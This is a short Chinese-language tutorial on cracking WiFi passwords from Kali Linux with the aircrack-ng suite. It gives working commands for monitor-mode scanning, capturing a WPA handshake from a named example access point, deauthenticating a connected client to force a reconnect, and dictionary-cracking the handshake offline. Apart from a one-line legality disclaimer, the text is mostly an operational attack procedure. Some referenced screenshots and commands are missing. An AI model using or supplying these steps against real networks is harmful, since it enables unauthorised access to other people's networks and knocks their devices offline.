kali破解wifi密码
开始
选择合适的网卡,确保Kali能够正确识别。我使用的是以下网卡信息。
开启网卡的监听模式。
确认监听模式是否成功开启(如果网卡名称变成"wlan0mon",说明成功)。
输入命令"airodump-ng wlan0mon",扫描附近的热点信息。找到想要破解的热点名称后,按下Ctrl+C停止扫描(这里以"NEM-AL10"作为示例,但请注意破解他人无线密码是违法的,仅作为演示)。
- 抓取握手包。命令格式为"airodump-ng -c {CH} --bssid {BSSID} -w {保存握手包的目录}"。输入命令"airodump-ng -c 11 --bssid 3C:FA:43:7E:57:48 -w /home/ wlan0mon"。当成功抓到握手包时,箭头处会显示"handshake"字样。
- 目前还无法抓到握手包,因为没有客户端与接入点(AP)连接。但我们可以看到已经有一个热点处于连接状态。我们可以发送反认证包,将其强制下线,然后客户端会尝试重新连接热点,这样我们就能抓到握手包了。在新的终端窗口中,输入命令"aireplay-ng -0 {发送反认证包的个数} -a {BSSID} -c {强制下线的MAC地址(STATION下面的地址)} 无线网卡名称"。例如,输入"aireplay-ng -0 10 -a 3C:FA:43:7E:57:48 -c 30:10:B3:DC:9F:75 wlan0mon"。系统会将客户端强制下线,然后重新连接,这样我们就能抓到握手包了。
按下Ctrl+C停止抓包。在"/home"目录下查看握手包,其中"-01.cap"是我们接下来破解所需的数据包。
使用aircrack-ng进行破解。命令格式为"aircrack-ng -w {本地的字典文件(破解的关键)} {握手包}"。例如,输入"aircrack-ng -w top3000.txt /home/-01.cap"。由于握手包的命名特殊性,这里只能使用绝对路径,如果更改文件名,就可以使用相对路径了。
字典文件可以在网上找到很多,这里提供一个在GitHub上的示例。
结语:
破解的原理是逐个尝试密码。抓取握手包的原因是因为握手包中包含经过加密的密码。我们将握手包抓取下来后,可以在本地使用字典文件进行破解。每秒钟可以尝试几万个密码,而如果没有握手包,我们只能手动输入密码,速度会很慢。即使使用程序进行尝试,也不能保证路由器没有设置错误次数,有可能会禁止连接。另外,每次与路由器交互所需的时间也大于一秒。
